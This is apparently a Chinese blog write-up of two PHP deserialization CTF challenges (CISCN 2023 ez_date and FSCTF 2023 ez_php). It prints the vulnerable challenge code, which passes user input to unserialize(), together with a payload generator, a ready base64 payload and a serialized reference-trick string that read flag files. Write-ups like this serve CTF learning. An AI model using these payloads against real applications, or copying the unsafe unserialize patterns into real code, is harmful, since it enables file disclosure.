（反序列化）小记录

?

目录

?[CISCN 2023 华北]ez_date

绕过MD5和sha1强相关绕过

date()绕过

payload

[FSCTF 2023]ez_php

?[CISCN 2023 华北]ez_date

<?php
error_reporting(0);
highlight_file(__FILE__);
class date{
    public $a;
    public $b;
    public $file;
    public function __wakeup()
    {
        if(is_array($this->a)||is_array($this->b)){
            die('no array');
        }
        if( ($this->a !== $this->b) && (md5($this->a) === md5($this->b)) && (sha1($this->a)=== sha1($this->b)) ){
            $content=date($this->file);
            $uuid=uniqid().'.txt';
            file_put_contents($uuid,$content);
            $data=preg_replace('/((\s)*(\n)+(\s)*)/i','',file_get_contents($uuid));
            echo file_get_contents($data);
        }
        else{
            die();
        }
    }
}

unserialize(base64_decode($_GET['code']));

不能用数组绕过，且a不能等于b，a、b的md5和sha1的值要强相关相等

date函数会对特定的字母转化为特定的时间表达格式

把file的内容进行date函数处理当作数据，uniqid的数据作文件名

????????uniqid()是PHP中的一个函数，用于生成唯一的字符串。它可以带一个可选的前缀参数和一个用于指定是否使用更多的熵的布尔类型的参数。

????????当没有任何参数传入uniqid()函数时，它会生成一个基于当前时间微秒数的唯一字符串。如果在同一微秒内调用uniqid()函数多次，则会生成不同的字符串，因为它还会添加一个随机数，以防止生成重复的字符串。

????????如果指定了前缀参数，则生成的字符串将以该前缀开头。例如，uniqid('prefix_')可能会生成类似于prefix_5f9a1d1bcb6c2的字符串。前缀参数通常用于生成特定的唯一标识符，例如用于数据库表的主键。

????????第二个参数用于指定是否使用更多的熵来增加生成唯一字符串的难度。如果设置为true，则会添加额外的信息（如当前进程ID、线程ID或时间戳）来生成更长的唯一字符串。

之后对这个文件进行正则表达式的替换

正则表达的解释

绕过MD5和sha1强相关绕过

($this->a !== $this->b) && (md5($this->a) === md5($this->b)) && (sha1($this->a)=== sha1($this->b))

1.用原生类error绕过

网上说可以，但是一些大佬说不过不知为何php8下可用, 放到5和7不可用, 题目貌似也是7, 这条路走不通

2.数字型和字符型的绕过

由于前面是!==，所以第一个判断数字型和字符型是1

date()绕过

对里面的字符加反斜杠防止转义

如上图

payload

<?php
class date{
    public $a=1;
    public $b='1';
    public $file='/f\l\a\g';
}
$c=new date;
echo base64_encode(serialize($c));

结果
Tzo0OiJkYXRlIjozOntzOjE6ImEiO2k6MTtzOjE6ImIiO3M6MToiMSI7czo0OiJmaWxlIjtzOjg6Ii9mXGxcYVxnIjt9

[FSCTF 2023]ez_php1

进入题目

第一个数组绕过

第二个随便FL_AG=1，得到提示!!!Congratulation!!L0vey0U.php

解释一下正则表达式

preg_match('/^.*(flag).*$/',?$ja)

进到L0vey0U.php

L0vey0U.php?str=s:10:"YES I love";

得到P0int.php

进到P0int.php

 <?php
highlight_file(__FILE__);
error_reporting(0);
class Clazz
{
    public $a;
    public $b;

    public function __wakeup()
    {
        $this->a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
    }
    public function __destruct()
    {
        echo $this->b;
    }
}
@unserialize($_POST['data']);

?>

这里应该输出$a的值，而不是$b的值

用引用的方法

O:5:"Clazz":2:{s:1:"a";N;s:1:"b";R:2;}

r为2代表是第二个反序列化元素被引用